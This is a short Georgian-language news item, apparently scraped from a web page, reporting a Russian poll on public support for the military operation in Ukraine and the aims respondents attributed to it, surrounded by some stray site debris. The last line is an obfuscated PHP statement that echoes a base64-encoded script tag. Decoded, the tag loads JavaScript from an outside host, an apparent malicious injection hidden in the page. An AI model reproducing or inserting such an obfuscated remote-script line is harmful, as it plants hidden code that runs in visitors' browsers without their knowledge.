celsiusi
ავერსი საქკაბელი
5-6 მარტს რუსეთში ჩატარებული კვლევის თანახმად. რუსეთის მოქალაქეების 68% უკრაინაში აგრესიას მხარს უჭერს. “საზოგადოებრივი აზრის ფონდის” მიერ დასმულ კითხვაზე “სწორია თუ არა უკრაინაში სამხედრო ოპერაციის წარმოება?”, პასუხი სწორია 68 პროცენტმა გასცა, “არასწორია” 15%-მა. 17%-ს კითხვაზე პასუხი გაუჭირდა.
 
აღსანიშნავია, რომ 27 თებერვალს ჩატარებული ანალოგიური კვლევის შედეგი შესაბამისად 65%-17%-18% იყო.
 
კითხვაზე, “რა მიზნებს ისახავს რუსეთის სამხედრო ოპერაცია?”:
 
62% “ლუგანსკ-დონეცკის” მოსახლეობის დაცვას” ასახელებს,
 
39% – “უკრაინაში NATO-ს ბაზების განთავსების არდაშვებას”,
 
20% – “დონეცკის რუსეთთან მიერთებას”,
 
16%  თვლის, რომ “რუსეთი უკრაინაში პოლიტიკური წყობის შეცვლას და პრორუსი ხელისუფლების დასმას” აპირებს,
 
9% – უკრაინის რუსეთთან შეერთებას,
 
7%-ს კითხვაზე პასუხის გაცემა გაუჭირდა.
886
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");